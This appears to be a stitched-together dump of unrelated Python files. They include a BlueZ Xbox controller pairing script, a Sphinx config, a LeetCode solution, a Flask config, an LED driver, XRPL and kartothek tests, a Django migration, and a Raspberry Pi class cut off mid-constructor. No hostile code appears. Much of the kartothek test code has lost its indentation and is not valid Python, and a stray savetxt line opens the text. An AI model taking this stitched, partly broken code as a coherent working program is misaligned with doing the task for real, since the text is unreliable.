np.savetxt('lb.csv', res, delimiter=',', fmt=['%d', '%.10f'])
|
#
# API Reference:
# https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/doc
#
from pydbus import SystemBus
from xml.etree import ElementTree as ET
import time, sys
_max_search_time = 40
def forget_all():
    """Remove every paired Xbox controller from adapter hci0."""
    bus = SystemBus()  # type: pydbus.bus.Bus
    _forget_all_devices(bus, bus.get('org.bluez', '/org/bluez/hci0'))
def force_connect():
    """Reconnect all paired-but-disconnected Xbox controllers on hci0."""
    bus = SystemBus()  # type: pydbus.bus.Bus
    _connect_all_xbox_controllers(bus, bus.get('org.bluez', '/org/bluez/hci0'))
def pair_new():
    """Discover and pair new Xbox controllers; return how many were paired."""
    bus = SystemBus()  # type: pydbus.bus.Bus
    hci0 = bus.get('org.bluez', '/org/bluez/hci0')
    return _pair_xbox_controllers(bus, _find_xbox_controllers(bus, hci0))
def _find_xbox_controllers(bus, adapter):
    """Scan for unpaired Xbox controllers for up to _max_search_time seconds.

    Returns the list of discovered unpaired controllers, or [] on timeout.
    """
    print('looking for controllers')
    start = time.time()
    try:
        adapter.StartDiscovery()
        print('discovery began')
        while time.time() - start < _max_search_time:
            unpaired_devices = _list_xbox_controllers(bus, adapter, paired=False)
            if len(unpaired_devices) > 0:
                print('found {0} controllers'.format(len(unpaired_devices)))
                return unpaired_devices
            time.sleep(5)  # poll every 5 s while discovery runs
    finally:
        # Always stop discovery, even when returning early above.
        print('discovery finished')
        adapter.StopDiscovery()
    return []
def _list_xbox_controllers(bus, adapter, paired=None, connected=None):
    """Return known devices named 'Xbox Wireless Controller'.

    *paired* / *connected* filter on those flags; None means "either".
    """
    def keep(dev):
        if dev['name'] != 'Xbox Wireless Controller':
            return False
        if paired is not None and dev['paired'] != paired:
            return False
        if connected is not None and dev['connected'] != connected:
            return False
        return True

    return [dev for dev in _list_devices(bus, adapter) if keep(dev)]
def _list_devices(bus, adapter):
    """Enumerate all devices known to the adapter via D-Bus introspection.

    Returns a list of dicts with name/address/dev/trusted/paired/connected.
    """
    data = ET.XML(adapter.Introspect())
    # Child <node> names are the per-device object-path suffixes.
    dev_uuids = [node.attrib['name'] for node in data.findall('node')]
    ret_val = []
    for dev_id in dev_uuids:
        device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(dev_id))
        ret_val.append({
            'name' : device.Alias,
            'address' : device.Address,
            'dev' : dev_id,
            'trusted' : device.Trusted,
            'paired' : device.Paired,
            'connected' : device.Connected
        })
    return ret_val
def _connect_all_xbox_controllers(bus, adapter):
    """Connect every paired-but-disconnected Xbox controller."""
    unconnected_controllers = _list_xbox_controllers(bus, adapter, paired=True, connected=False)
    for controller in unconnected_controllers:
        device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(controller['dev']))
        device.Connect()
        print('connected fine')
def _pair_xbox_controllers(bus, controllers):
    """Try to pair, trust and connect each controller; return the success count.

    Pairing is retried once; failed devices are removed from the adapter so a
    later scan can start fresh.
    """
    pair_count = 0
    for controller in controllers:
        device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(controller['dev']))
        print('attempting to pair to {0}'.format(controller))
        retry = 0
        while retry < 2:
            try:
                device.Pair()
                break
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt —
                # consider narrowing to Exception.
                print ('connect failed : {0}'.format(sys.exc_info()[0]))
                time.sleep(2)
                retry = retry + 1
        if device.Paired:
            print('pair successful')
            device.Trusted = True
            print('trusted now')
            device.Connect()
            print('connected fine')
            pair_count = pair_count + 1
        else:
            # Pairing failed: drop the half-registered device.
            adapter = bus.get('org.bluez', '/org/bluez/hci0')
            adapter.RemoveDevice('/org/bluez/hci0/{0}'.format(controller['dev']))
    return pair_count
def _forget_all_devices(bus, adapter):
    """Unregister every paired Xbox controller from the adapter."""
    controllers = _list_xbox_controllers(bus, adapter, paired=True)
    for controller in controllers:
        adapter.RemoveDevice('/org/bluez/hci0/{0}'.format(controller['dev']))
        print('removed device {0}'.format(controller))
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'UVVM'
author = 'UVVM'
copyright = '2021, UVVM'
# The full version, including alpha/beta/rc tags
def read_uvvm_version(fname):
    """Return the first UVVM version heading found in *fname*.

    A version heading is a line starting with 'v' that is underlined by a
    row of dashes on the following line (reST section style), e.g.::

        v2.1.0
        ------

    Parameters
    ----------
    fname : str
        Path relative to this configuration file's directory.

    Returns
    -------
    str or None
        The stripped version line, or None when no heading is present.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as rf:
        lines = rf.readlines()
    for idx, line in enumerate(lines):
        # Guard idx + 1: a trailing 'v' line with no underline used to
        # raise IndexError here.
        if line.startswith('v') and idx + 1 < len(lines):
            if '----' in lines[idx + 1]:
                return line.strip()
    return None
def read_module_version(fname):
    """Return every line of *fname* after the header, stripped, one per line.

    Reads the file located next to this configuration file and
    concatenates all lines except the first, each terminated by a newline.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path) as handle:
        all_lines = handle.readlines()
    return ''.join(entry.strip() + '\n' for entry in all_lines[1:])
uvvm_version = read_uvvm_version('../../CHANGES.TXT')
module_versions = read_module_version('../../versions.txt')
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
highlight_language = 'VHDL'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_options = {
'navigation_depth': '5',
'style_nav_header_background': '#F5F5F5',
'logo_only': 'True'
}
html_logo = 'images/uvvm.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static'] |
class Solution:
    """LeetCode 121: best profit from a single buy followed by a single sell."""

    def maxProfit(self, prices: list) -> int:
        """Return the maximum single-transaction profit (0 if no profit)."""
        if len(prices) <= 1:
            return 0
        best_profit = 0
        cheapest = prices[0]
        for price in prices:
            # Evaluate selling at today's price before updating the minimum,
            # so buy always precedes sell.
            if price - cheapest > best_profit:
                best_profit = price - cheapest
            if price < cheapest:
                cheapest = price
        return best_profit
if __name__ == '__main__':
    # Demo run against the canonical example input (expected output: 5).
    print(Solution().maxProfit([7, 1, 5, 3, 6, 4]))
|
import os

# Flask / SQLAlchemy configuration module.
#
# NOTE(review): generating a fresh random SECRET_KEY on every start
# invalidates all existing sessions/cookies at each restart.  Prefer an
# externally supplied key; fall back to a random one only for ad-hoc runs.
SECRET_KEY = os.environ.get('SECRET_KEY') or os.urandom(24)
# NOTE(review): DEBUG=True must never reach production (the interactive
# debugger allows arbitrary code execution) -- confirm deployment config.
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
# NOTE(review): modification tracking adds overhead; set to False unless
# the SQLAlchemy event system is actually used.
SQLALCHEMY_TRACK_MODIFICATIONS = True
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# [Grove - Chainable RGB LED X 2](http://wiki.seeedstudio.com/Grove-Chainable_RGB_LED/)
# on A2
import time
from Shell import InstallDTBO
import os
class P981X:
    """Driver for a chain of P981x (Grove chainable RGB) LEDs.

    Talks to the kernel driver through the /dev/p981x0 character device,
    installing the BB-GPIO-P9813 device-tree overlay on demand.
    """

    def __init__(self, leds=2):
        """Open the device node and configure the chain length.

        leds: number of LEDs on the chain (default 2).
        """
        self.Path = '/proc/device-tree/p981x_1057@20'
        self.P981x0 = '/dev/p981x0'
        try:
            # The overlay must be loaded before the device node is usable;
            # install it and poll until the device-tree entry appears.
            if not os.path.exists(self.Path):
                InstallDTBO('BB-GPIO-P9813')
                while not os.path.exists(self.Path):
                    time.sleep(0.1)
            self.f = open(self.P981x0, 'w')
            # 'N <count>' tells the driver how many LEDs are chained.
            self.f.write('N %d\n' % leds)
            self.f.flush()
        except IOError as error:
            print("File Error:" + str(error))
            print("maybe you should reinstall the driver of p981x")

    def set(self, led, red, green, blue):
        """Write one LED's colour.

        led: index on the chain (0 or 1 by default).
        red/green/blue: channel values in 0~255.
        """
        try:
            # 'D <led> <r> <g> <b>' sets a single LED.
            self.f.write('D %d %d %d %d\n' % (led, red, green, blue))
            self.f.flush()
        except IOError as error:
            print("File Error:" + str(error))
            print("maybe you should reinstall the driver of p981x")
def main():
    """Blink two LEDs forever, swapping red and green every quarter second."""
    leds = P981X()
    red, green = (0x20, 0, 0), (0, 0x20, 0)
    while True:
        leds.set(0, *red)
        leds.set(1, *green)
        time.sleep(0.25)
        leds.set(0, *green)
        leds.set(1, *red)
        time.sleep(0.25)


if __name__ == "__main__":
    main()
from unittest import TestCase
from xrpl.models.exceptions import XRPLModelException
from xrpl.models.transactions import AccountSet
# Shared fixture values for the AccountSet model tests below.
_ACCOUNT = "r9LqNeG6qHxjeUocjvVki2XR35weJ9mZgQ"  # classic XRPL address
_FEE = "0.00001"  # transaction fee (string form, in XRP)
_SEQUENCE = 19048  # account sequence number
class TestAccountSet(TestCase):
    """Validation tests for the AccountSet transaction model."""

    def _assert_invalid(self, **fields):
        """Build an AccountSet from base fields + *fields*; expect a model error."""
        transaction_dict = {
            "account": _ACCOUNT,
            "fee": _FEE,
            "sequence": _SEQUENCE,
        }
        transaction_dict.update(fields)
        with self.assertRaises(XRPLModelException):
            AccountSet(**transaction_dict)

    def test_same_set_flag_and_clear_flag(self):
        # set_flag and clear_flag may not be equal.
        self._assert_invalid(
            set_flag=3,
            clear_flag=3,
            domain="asjcsodafsaid0f9asdfasdf",
        )

    def test_uppercase_domain(self):
        # Domains must be lowercase.
        self._assert_invalid(clear_flag=3, domain="asjcsodAOIJFsaid0f9asdfasdf")

    def test_invalid_tick_size(self):
        # tick_size outside the allowed range.
        self._assert_invalid(clear_flag=3, tick_size=39)

    def test_invalid_transfer_rate(self):
        # transfer_rate outside the allowed range.
        self._assert_invalid(clear_flag=3, transfer_rate=39)
|
# -*- coding: utf-8 -*-
import pandas as pd
import pytest
from kartothek.api.discover import discover_datasets_unchecked
from kartothek.core.cube.cube import Cube
from kartothek.io.eager import copy_dataset
from kartothek.io.eager_cube import build_cube, query_cube
from kartothek.utils.ktk_adapters import get_dataset_keys
__all__ = (
"assert_same_keys",
"built_cube",
"cube",
"df_enrich",
"df_seed",
"simple_cube_1",
"simple_cube_2",
"test_fail_blocksize_negative",
"test_fail_blocksize_wrong_type",
"test_fail_blocksize_zero",
"test_fail_no_src_cube",
"test_fail_no_src_cube_dataset",
"test_fail_no_store_factory_src",
"test_fail_no_store_factory_tgt",
"test_fail_stores_identical_overwrite_false",
"test_ignore_other",
"test_invalid_partial_copy",
"test_invalid_partial_copy1",
"test_invalid_partial_copy2",
"test_overwrite_fail",
"test_overwrite_ok",
"test_partial_copy_dataset_dict",
"test_partial_copy_dataset_list",
"test_read_only_source",
"test_simple",
"test_simple_copy_cube_rename_dataset",
"test_simple_copy_cube_rename_cube_prefix",
"test_simple_copy_cube_rename_cube_prefix_and_dataset",
"test_copy_fail_overwrite_true",
"test_copy_fail_overwrite_false",
"test_simple_rename_cube_same_stores",
)
@pytest.fixture
def cube():
    """Cube skeleton: dimension column x, partition column p, uuid prefix 'cube'."""
    return Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
@pytest.fixture
def df_seed():
    """Seed dataframe: dimension x, partition p, payload column v1."""
    return pd.DataFrame({"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]})
@pytest.fixture
def df_enrich():
    """Enrichment dataframe matching df_seed but carrying payload column v2."""
    return pd.DataFrame({"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]})
@pytest.fixture
def built_cube(df_seed, df_enrich, cube, function_store):
    """Build the two-dataset cube (seed + enrich) into function_store."""
    return build_cube(
        data={cube.seed_dataset: df_seed.copy(), "enrich": df_enrich.copy()},
        cube=cube,
        store=function_store,
    )
@pytest.fixture
def simple_cube_1(function_store, built_cube):
    """All store keys after building the two-dataset cube into store 1."""
    return set(function_store().keys())
@pytest.fixture
def simple_cube_2(df_seed, df_enrich, cube, function_store2):
    """All store keys after building a seed-only cube into store 2."""
    build_cube(data={cube.seed_dataset: df_seed}, cube=cube, store=function_store2)
    return set(function_store2().keys())
def assert_target_cube_readable(tgt_cube_uuid, tgt_store, df_seed, df_enrich):
    """Query the copied cube and check both payload columns survived.

    Reconstructs a Cube object under *tgt_cube_uuid* and asserts that the
    query result matches the original seed (v1) and enrich (v2) frames.
    """
    tgt_cube = Cube(
        dimension_columns=["x"], partition_columns=["p"], uuid_prefix=tgt_cube_uuid
    )
    tgt_cube_res = query_cube(cube=tgt_cube, store=tgt_store)[0]
    assert tgt_cube_res is not None
    assert tgt_cube_res[["x", "p", "v1"]].equals(df_seed)
    assert tgt_cube_res[["x", "p", "v2"]].equals(df_enrich)
def assert_same_keys(store1, store2, keys):
    """Assert that *keys* exist in both stores with identical blobs.

    Parameters
    ----------
    store1, store2 : zero-argument callables returning a store object
        (factory style, as used throughout these tests).
    keys : set of keys expected to be present in both stores.
    """
    k1 = set(store1().keys())
    k2 = set(store2().keys())
    assert keys.issubset(k1)
    assert keys.issubset(k2)
    for k in sorted(keys):
        b1 = store1().get(k)
        # BUG FIX: the second blob must come from store2 -- the original
        # read store1 twice, making the comparison vacuously true.
        b2 = store2().get(k)
        assert b1 == b2
def test_simple(driver, function_store, function_store2, cube, simple_cube_1):
    """Copying a cube between stores reproduces every key byte-for-byte."""
    driver(cube=cube, src_store=function_store, tgt_store=function_store2)
    assert_same_keys(function_store, function_store2, simple_cube_1)
def test_simple_copy_cube_rename_dataset(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a dataset while copying, but leave the cube name as is
"""
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
ds_name_old = "enrich"
ds_name_new = "augmented"
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_datasets={ds_name_old: ds_name_new},
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(ds_name_old, ds_name_new)
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(ds_name_old, ds_name_new)
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable("cube", function_store2, df_seed, df_enrich)
def test_simple_copy_cube_rename_cube_prefix(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a cube while copying, but leave the dataset names as they are
"""
old_cube_prefix = "cube"
new_cube_prefix = "my_target_cube"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix=new_cube_prefix,
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable(new_cube_prefix, function_store2, df_seed, df_enrich)
def test_simple_copy_cube_rename_cube_prefix_and_dataset(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a cube and a dataset while copying
"""
old_cube_prefix = "cube"
new_cube_prefix = "my_target_cube"
ds_name_old = "enrich"
ds_name_new = "augmented"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix=new_cube_prefix,
renamed_datasets={ds_name_old: ds_name_new},
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(
f"{old_cube_prefix}++", f"{new_cube_prefix}++"
).replace(f"++{ds_name_old}", f"++{ds_name_new}")
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
.replace(f"++{ds_name_old}", f"++{ds_name_new}")
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable(new_cube_prefix, function_store2, df_seed, df_enrich)
def test_simple_rename_cube_same_stores(
driver, function_store, cube, simple_cube_1, df_seed, df_enrich
):
new_cube_prefix = "my_target_cube"
ds_name_old = "enrich"
ds_name_new = "augmented"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
with pytest.raises(ValueError):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store,
renamed_cube_prefix=new_cube_prefix,
renamed_datasets={ds_name_old: ds_name_new},
)
def test_copy_fail_overwrite_true(
driver, mocker, cube, simple_cube_1, function_store, function_store2
):
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
with pytest.raises(RuntimeError):
with mocker.patch(
"kartothek.io.eager_cube.copy_dataset",
side_effect=ValueError("Copying cube failed horribly."),
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix="new_cube",
overwrite=True,
)
def test_copy_fail_overwrite_false(
driver, mocker, cube, simple_cube_1, function_store, function_store2
):
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
def side_effect(*args, **kwargs):
if side_effect.counter == 0:
side_effect.counter += 1
return copy_dataset(*args, **kwargs)
else:
raise ValueError("Something unexpected happened during cube copy.")
side_effect.counter = 0
with mocker.patch("kartothek.io.eager_cube.copy_dataset", side_effect=side_effect):
from kartothek.io_components.cube.write import MultiTableCommitAborted
with pytest.raises(MultiTableCommitAborted):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix="new_cube",
overwrite=False,
)
# rollback transaction means that only the metadata file is deleted
# therefore we still have remaining parquet files
assert len(function_store2().keys()) == 3
def test_overwrite_fail(
driver, function_store, function_store2, cube, simple_cube_1, simple_cube_2
):
assert simple_cube_1 != simple_cube_2
data_backup = {k: function_store2().get(k) for k in simple_cube_2}
with pytest.raises(RuntimeError) as exc:
driver(cube=cube, src_store=function_store, tgt_store=function_store2)
assert (
str(exc.value)
== 'Dataset "cube++seed" exists in target store but overwrite was set to False'
)
# check everything kept untouched
assert set(function_store2().keys()) == simple_cube_2
for k in sorted(simple_cube_2):
assert function_store2().get(k) == data_backup[k]
def test_overwrite_ok(
driver, function_store, function_store2, cube, simple_cube_1, simple_cube_2
):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, overwrite=True
)
assert_same_keys(function_store, function_store2, simple_cube_1)
@pytest.mark.parametrize("overwrite", [False, True])
def test_fail_stores_identical_overwrite_false(
driver, function_store, cube, built_cube, overwrite
):
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store,
overwrite=overwrite,
)
assert str(exc.value) == "Stores are identical but should not be."
def test_ignore_other(driver, function_store, function_store2):
dfs = []
cubes = []
for i in range(3):
dfs.append(
pd.DataFrame(
{
"x{}".format(i): [0, 1, 2, 3],
"p": [0, 0, 1, 1],
"v{}".format(i): [10, 11, 12, 13],
}
)
)
cubes.append(
Cube(
dimension_columns=["x{}".format(i)],
partition_columns=["p"],
uuid_prefix="cube{}".format(i),
)
)
build_cube(data=dfs[0], cube=cubes[0], store=function_store)
build_cube(data=dfs[1], cube=cubes[1], store=function_store)
build_cube(data=dfs[2], cube=cubes[2], store=function_store2)
keys_in_1 = set(function_store().keys())
keys_in_2 = set(function_store2().keys())
data_backup1 = {k: function_store().get(k) for k in keys_in_1}
data_backup2 = {k: function_store2().get(k) for k in keys_in_2}
driver(cube=cubes[1], src_store=function_store, tgt_store=function_store2)
# store 1 is untouched
assert set(function_store().keys()) == keys_in_1
for k in sorted(keys_in_1):
assert function_store().get(k) == data_backup1[k]
# store 2 is partly untouched
for k in sorted(keys_in_2):
assert function_store2().get(k) == data_backup2[k]
# test new keys
keys_new = set(function_store2().keys()) - keys_in_2
assert_same_keys(function_store, function_store2, keys_new)
def test_invalid_partial_copy1(
df_seed, df_enrich, cube, function_store, function_store2, simple_cube_2, driver
):
# build a cube that would be incompatible w/ simple_cube_2
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
keys = set(function_store().keys())
# now copy simple_cube_2 over existing cube.
# this only copies the seed table since simple_cube_2 does not have an enrich table.
# it should fail because X is incompatible
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store2,
tgt_store=function_store,
overwrite=True,
)
assert 'Found incompatible entries for column "x"' in str(exc.value)
assert keys == set(function_store().keys())
def test_invalid_partial_copy2(
df_seed, df_enrich, cube, function_store, function_store2, simple_cube_1, driver
):
# build a cube that would be incompatible w/ simple_cube_1
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich2": df_enrich},
cube=cube,
store=function_store2,
)
keys = set(function_store2().keys())
# now copy simple_cube_1 over existing cube.
# this only copies the seed and enrich table since simple_cube_1 does not have an enrich2 table.
# it should fail because X is incompatible.
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=True,
)
assert "Found columns present in multiple datasets" in str(exc.value)
assert keys == set(function_store2().keys())
def test_partial_copy_dataset_list(
driver, function_store, function_store2, cube, built_cube
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
datasets=["seed", "enrich"],
)
all_datasets = discover_datasets_unchecked(
uuid_prefix=cube.uuid_prefix,
store=function_store,
filter_ktk_cube_dataset_ids=["seed", "enrich"],
)
copied_ds_keys = set()
copied_ds_keys |= get_dataset_keys(all_datasets["seed"])
copied_ds_keys |= get_dataset_keys(all_datasets["enrich"])
tgt_store_keys = set(function_store2().keys())
assert copied_ds_keys == tgt_store_keys
def test_partial_copy_dataset_dict(
driver, function_store, function_store2, cube, built_cube
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
datasets={"seed": built_cube["seed"], "enrich": built_cube["enrich"]},
)
all_datasets = discover_datasets_unchecked(
uuid_prefix=cube.uuid_prefix,
store=function_store,
filter_ktk_cube_dataset_ids=["seed", "enrich"],
)
copied_ds_keys = set()
copied_ds_keys |= get_dataset_keys(all_datasets["seed"])
copied_ds_keys |= get_dataset_keys(all_datasets["enrich"])
tgt_store_keys = set(function_store2().keys())
assert copied_ds_keys == tgt_store_keys
def test_invalid_partial_copy(
driver, df_seed, df_enrich, function_store, function_store2, cube, built_cube
):
# build a cube that would be incompatible with cube in function_store
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store2,
)
tgt_store_key_before = set(function_store2().keys())
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=True,
datasets=["enrich"],
)
assert 'Found incompatible entries for column "x"' in str(exc.value)
assert tgt_store_key_before == set(function_store2().keys())
def test_fail_no_store_factory_src(
driver, function_store, function_store2, cube, skip_eager
):
store = function_store()
with pytest.raises(TypeError) as exc:
driver(cube=cube, src_store=store, tgt_store=function_store2, no_run=True)
assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_no_store_factory_tgt(
driver, function_store, function_store2, cube, skip_eager
):
store = function_store2()
with pytest.raises(TypeError) as exc:
driver(cube=cube, src_store=function_store, tgt_store=store, no_run=True)
assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_no_src_cube(cube, function_store, function_store2, driver):
with pytest.raises(RuntimeError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=False,
)
assert "not found" in str(exc.value)
def test_fail_no_src_cube_dataset(
cube, built_cube, function_store, function_store2, driver
):
with pytest.raises(RuntimeError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=False,
datasets=["non_existing"],
)
assert "non_existing" in str(exc.value)
def test_read_only_source(
driver, function_store_ro, function_store2, cube, simple_cube_1
):
driver(cube=cube, src_store=function_store_ro, tgt_store=function_store2)
assert_same_keys(function_store_ro, function_store2, simple_cube_1)
def test_fail_blocksize_wrong_type(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(TypeError, match="blocksize must be an integer but is str"):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
blocksize="foo",
)
def test_fail_blocksize_negative(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(ValueError, match="blocksize must be > 0 but is -1"):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, blocksize=-1
)
def test_fail_blocksize_zero(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(ValueError, match="blocksize must be > 0 but is 0"):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, blocksize=0
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2019-04-16 13:33
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated: removes the Comment model, dropping its 'article'
    # and 'reply' foreign keys first (required before DeleteModel).
    # NOTE(review): generated migrations should not be hand-edited.
    dependencies = [
        ('blog', '0009_auto_20190416_2108'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='comment',
            name='article',
        ),
        migrations.RemoveField(
            model_name='comment',
            name='reply',
        ),
        migrations.DeleteModel(
            name='Comment',
        ),
    ]
|
'''
Desafio K
'''
def reverse(b):
    """Return string *b* reversed.

    The original built the result by prepending characters one at a time
    (quadratic) and shadowed the builtin name ``str``; slicing does the
    same work in a single step.
    """
    return b[::-1]
# Read an integer, reverse its binary representation, and print the
# resulting value (e.g. 6 -> '110' -> '011' -> 3).
n = int(input())
bi = format(n,'b')  # binary string without the '0b' prefix
bi = reverse(bi)  # reverse the bit string (helper defined above)
bi = int(bi,2)  # parse the reversed bits back into an integer
print(bi)
|
#017-2.py
# Create (or overwrite) write_sample.txt with two demo lines.
with open("write_sample.txt", 'w') as handle:
    handle.writelines(["Hello\n", "write_sample text file\n"])
|
from django.urls import path
from . import views
from polls.Controller.userController import userController
# URL routes for the polls app.
urlpatterns = [
    # Function-based views from polls/views.py.
    path('', views.index, name="index"),
    path('test/', views.test, name="test"),
    path('question_list/', views.question_list, name="question_list"),
    path('detail_question/<int:question_id>', views.detailView, name="detail_question"),
    path('getQuestionById/<int:question_id>', views.getQuestionById, name="getQuestionById"),
    # Routes handled by the userController class (login form flow).
    path('getLoginForm', userController.getLoginForm, name="getLoginForm"),
    path('postLoginForm', userController.postLoginForm, name="postLoginForm"),
]
from Switch import Switch
import RPi.GPIO as GPIO
class Scrubmode(object):
    """Timed state machine driving the scrub-mode coil of a target bank.

    The long GP* constructor parameters are Switch objects wired to the
    yellow targets (left/right x top/middle/bottom) and the red
    scrub-mode button; coilPinOne/coilPinTwo are GPIO output pins.
    """
    # NOTE(review): outputs appear active-low here (HIGH maps to GPIO 0,
    # LOW to 1) -- confirm against the relay wiring before changing.
    HIGH = 0
    LOW = 1
    def __init__(self,name, coilPinOne,coilPinTwo, GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN,GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN,GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN,GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN,GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN, GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN, GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE):
        """Store the coil pins and switch objects; reset the state machine."""
        self.maxTimeEnabled = 0.05  # seconds per state-machine step
        self.timeEnabled = 0.0  # time accumulated in the current step
        self.inTransition = 0  # 0 = idle, 1 = three-step sequence, 2 = single pulse
        self.transitionState = 0  # sub-state of the three-step sequence
        self.name = name
        self.coilPinOne = coilPinOne
        self.coilPinTwo = coilPinTwo
        self.GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN = GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN
